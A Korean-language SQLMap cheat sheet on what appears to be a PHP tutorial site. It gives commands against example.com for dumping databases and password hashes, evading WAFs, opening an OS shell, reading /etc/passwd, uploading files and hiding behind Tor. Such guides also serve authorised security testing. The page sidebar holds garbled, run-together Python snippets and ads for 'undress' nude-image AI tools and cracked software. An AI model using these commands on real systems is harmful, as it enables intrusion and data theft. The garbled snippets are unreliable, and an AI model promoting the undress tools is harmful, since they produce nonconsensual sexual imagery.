작가: 트릭스 사이러스
SQLMap이란 무엇인가요?
SQLMap은 웹 애플리케이션의 SQL 주입 취약점을 탐지하고 악용하는 데 사용되는 오픈 소스 침투 테스트 도구입니다. MySQL, PostgreSQL, Oracle, Microsoft SQL Server 등과 같은 다양한 데이터베이스 시스템을 지원합니다.
기본 사용법
SQLMap을 시작하려면 대상 URL을 제공하여 가장 간단한 형식으로 실행할 수 있습니다.
sqlmap -u "http://example.com/index.php?id=1"
이 명령은 대상 URL에서 SQL 주입 취약점을 검사합니다.
1. 취약점 감지
기본 취약점 검사를 수행하고 SQL 주입 지점을 자동으로 감지하려면 다음 옵션을 사용하세요.
sqlmap -u "http://example.com/index.php?id=1" --dbs
--dbs: 취약점이 발견되면 대상 서버에서 사용 가능한 모든 데이터베이스를 나열합니다.
2. POST 요청 지정
POST 요청(일반적으로 로그인 양식)이 필요한 대상의 경우 다음과 같이 데이터를 지정할 수 있습니다.
sqlmap -u "http://example.com/login.php" --data="username=admin&password=1234"
3. WAF 및 필터 우회
웹 애플리케이션 방화벽(WAF)을 회피하기 위해 SQLMap에는 페이로드 난독화 기술이 포함되어 있습니다.
sqlmap -u "http://example.com/index.php?id=1" --tamper=space2comment
--tamper: 변조 스크립트를 사용하여 필터를 회피합니다. 예: space2comment, charencode.
4. 데이터베이스, 테이블, 컬럼 추출
대상 시스템의 데이터베이스 목록을 얻으려면:
sqlmap -u "http://example.com/index.php?id=1" --dbs
데이터베이스가 식별되면 해당 테이블을 추출합니다.
sqlmap -u "http://example.com/index.php?id=1" -D database_name --tables
특정 테이블에서 열을 가져오려면:
sqlmap -u "http://example.com/index.php?id=1" -D database_name -T table_name --columns
5. 데이터 덤핑
테이블 내용을 덤프하는 것은 SQLMap의 가장 유용한 기능 중 하나입니다. 예를 들어, 특정 테이블의 모든 데이터를 덤프하려면:
sqlmap -u "http://example.com/index.php?id=1" -D database_name -T table_name --dump
6. 데이터베이스 사용자 및 비밀번호 열거
SQLMap은 데이터베이스 사용자를 열거하고 해시된 비밀번호를 해독하는 데에도 사용할 수 있습니다.
sqlmap -u "http://example.com/index.php?id=1" --users sqlmap -u "http://example.com/index.php?id=1" --passwords
7. 운영 체제 액세스
경우에 따라, 특히 데이터베이스 사용자에게 높은 수준의 권한이 있는 경우 SQLMap을 사용하여 운영 체제에서 명령을 실행할 수 있습니다.
sqlmap -u "http://example.com/index.php?id=1" --os-shell
이것은 대상 시스템에서 명령을 실행할 수 있는 대화형 셸을 제공합니다.
8. 파일 업로드 및 읽기
대상 시스템에서 파일을 읽거나 악성 파일을 업로드할 수도 있습니다(허용되는 경우):
sqlmap -u "http://example.com/index.php?id=1" --file-read="/etc/passwd" sqlmap -u "http://example.com/index.php?id=1" --file-write="/path/to/file" --file-dest="/destination/path"
9. 익명성을 위해 Tor 사용
신원을 숨기려면 Tor 네트워크를 통해 SQLMap을 실행할 수 있습니다.
sqlmap -u "http://example.com/index.php?id=1" --tor --tor-type=SOCKS5 --check-tor
--tor: Tor를 활성화합니다.
--check-tor: Tor를 통해 연결이 되었는지 확인합니다.
10. 세션 저장 및 재개
SQLMap을 사용하면 --session 옵션을 사용하여 진행 상황을 저장하고 재개할 수 있습니다.
sqlmap -u "http://example.com/index.php?id=1" --session=your_session_name
나중에 다음과 같은 방법으로 동일한 세션을 재개할 수 있습니다.
sqlmap -r your_session_name
11. 상세 모드
SQLMap이 수행하는 작업에 대한 자세한 정보를 보려면:
sqlmap -u "http://example.com/index.php?id=1" -v 3
-v 옵션은 자세한 내용을 제어합니다(0~6 수준, 6은 모든 세부 정보 표시).
- 여러 대상에 대한 자동 스캔
SQLMap은 파일에 저장된 여러 URL 검색을 지원합니다.
sqlmap -m urls.txt --batch
--batch: 기본 옵션을 사용하여 모든 프롬프트에 자동으로 응답하며 자동 스캔에 유용합니다.
검사를 진행하려면 --risk=3 및 --level=5도 사용하세요
이 치트 시트를 사용하여 독자에게 SQLMap의 필수 명령을 소개하고 SQL 주입 테스트를 시작하는 데 도움을 줄 수 있습니다.
~트릭스섹
위 내용은 SQLMap 치트 시트: 자동 SQL 주입을 위한 빠른 가이드의 상세 내용입니다. 자세한 내용은 PHP 중국어 웹사이트의 기타 관련 기사를 참조하세요!
Python 목록에 요소를 어떻게 추가합니까?May 04, 2025 am 12:17 AMtoAppendElementStoapyThonList, usetHeappend () MethodForsingleElements, extend () formultipleements, andinsert () forspecificpositions.1) useappend () foraddingOneElementatateend.2) usextend () toaddmultipleementsefficially
파이썬 목록을 어떻게 만드나요? 예를 들어보세요.May 04, 2025 am 12:16 AMTo TeCreateAtheThonList, usequareBrackets [] andseparateItemswithCommas.1) ListSaredynamicandCanholdMixedDatAtatypes.2) useappend (), remove () 및 SlicingFormAnipulation.3) listlisteforences;) ORSL
수치 데이터의 효율적인 저장 및 처리가 중요한 경우 실제 사용 사례에 대해 토론하십시오.May 04, 2025 am 12:11 AM금융, 과학 연구, 의료 및 AI 분야에서 수치 데이터를 효율적으로 저장하고 처리하는 것이 중요합니다. 1) 금융에서 메모리 매핑 파일과 Numpy 라이브러리를 사용하면 데이터 처리 속도가 크게 향상 될 수 있습니다. 2) 과학 연구 분야에서 HDF5 파일은 데이터 저장 및 검색에 최적화됩니다. 3) 의료에서 인덱싱 및 파티셔닝과 같은 데이터베이스 최적화 기술은 데이터 쿼리 성능을 향상시킵니다. 4) AI에서 데이터 샤딩 및 분산 교육은 모델 교육을 가속화합니다. 올바른 도구와 기술을 선택하고 스토리지 및 처리 속도 간의 트레이드 오프를 측정함으로써 시스템 성능 및 확장 성을 크게 향상시킬 수 있습니다.
파이썬 어레이를 어떻게 만드나요? 예를 들어보세요.May 04, 2025 am 12:10 AMPythonArraysareCreatedusingThearrayModule, Notbuilt-inlikelists.1) importThearrayModule.2) SpecifyTyPeCode (예 : 'forIntegers.3) 초기에 초기화 성과의 공동체 정보가없는 사람들이 플렉스리스트.
Python 통역사를 지정하기 위해 Shebang 라인을 사용하는 몇 가지 대안은 무엇입니까?May 04, 2025 am 12:07 AMShebang 라인 외에도 Python 통역사를 지정하는 방법에는 여러 가지가 있습니다. 1. 명령 줄에서 직접 Python 명령을 사용하십시오. 2. 배치 파일 또는 쉘 스크립트를 사용하십시오. 3. Make 또는 Cmake와 같은 빌드 도구를 사용하십시오. 4. Invoke와 같은 작업 러너를 사용하십시오. 각 방법에는 장점과 단점이 있으며 프로젝트의 요구에 맞는 방법을 선택하는 것이 중요합니다.
목록과 배열 사이의 선택은 큰 데이터 세트를 다루는 파이썬 응용 프로그램의 전반적인 성능에 어떤 영향을 미칩니 까?May 03, 2025 am 12:11 AMforhandlinglargedatasetsinpython, usenumpyarraysforbetterperformance.1) numpyarraysarememory-effic andfasterfornumericaloperations.2) leveragevectorization foredtimecomplexity.4) managemoryusage withorfications data
Python의 목록 대 배열에 대한 메모리가 어떻게 할당되는지 설명하십시오.May 03, 2025 am 12:10 AMinpython, listsusedyammoryAllocation과 함께 할당하고, whilempyarraysallocatefixedMemory.1) listsAllocatemememorythanneedInitiality.
파이썬 어레이에서 요소의 데이터 유형을 어떻게 지정합니까?May 03, 2025 am 12:06 AMInpython, youcansspecthedatatypeyfelemeremodelerernspant.1) usenpynernrump.1) usenpynerp.dloatp.ploatm64, 포모 선례 전분자.
핫 AI 도구
Undresser.AI Undress
사실적인 누드 사진을 만들기 위한 AI 기반 앱
AI Clothes Remover
사진에서 옷을 제거하는 온라인 AI 도구입니다.
Undress AI Tool
무료로 이미지를 벗다
Clothoff.io
AI 옷 제거제
Video Face Swap
완전히 무료인 AI 얼굴 교환 도구를 사용하여 모든 비디오의 얼굴을 쉽게 바꾸세요!
인기 기사
뜨거운 도구
SublimeText3 Linux 새 버전
SublimeText3 Linux 최신 버전
ZendStudio 13.5.1 맥
강력한 PHP 통합 개발 환경
DVWA
DVWA(Damn Vulnerable Web App)는 매우 취약한 PHP/MySQL 웹 애플리케이션입니다. 주요 목표는 보안 전문가가 법적 환경에서 자신의 기술과 도구를 테스트하고, 웹 개발자가 웹 응용 프로그램 보안 프로세스를 더 잘 이해할 수 있도록 돕고, 교사/학생이 교실 환경 웹 응용 프로그램에서 가르치고 배울 수 있도록 돕는 것입니다. 보안. DVWA의 목표는 다양한 난이도의 간단하고 간단한 인터페이스를 통해 가장 일반적인 웹 취약점 중 일부를 연습하는 것입니다. 이 소프트웨어는
에디트플러스 중국어 크랙 버전
작은 크기, 구문 강조, 코드 프롬프트 기능을 지원하지 않음
Eclipse용 SAP NetWeaver 서버 어댑터
Eclipse를 SAP NetWeaver 애플리케이션 서버와 통합합니다.
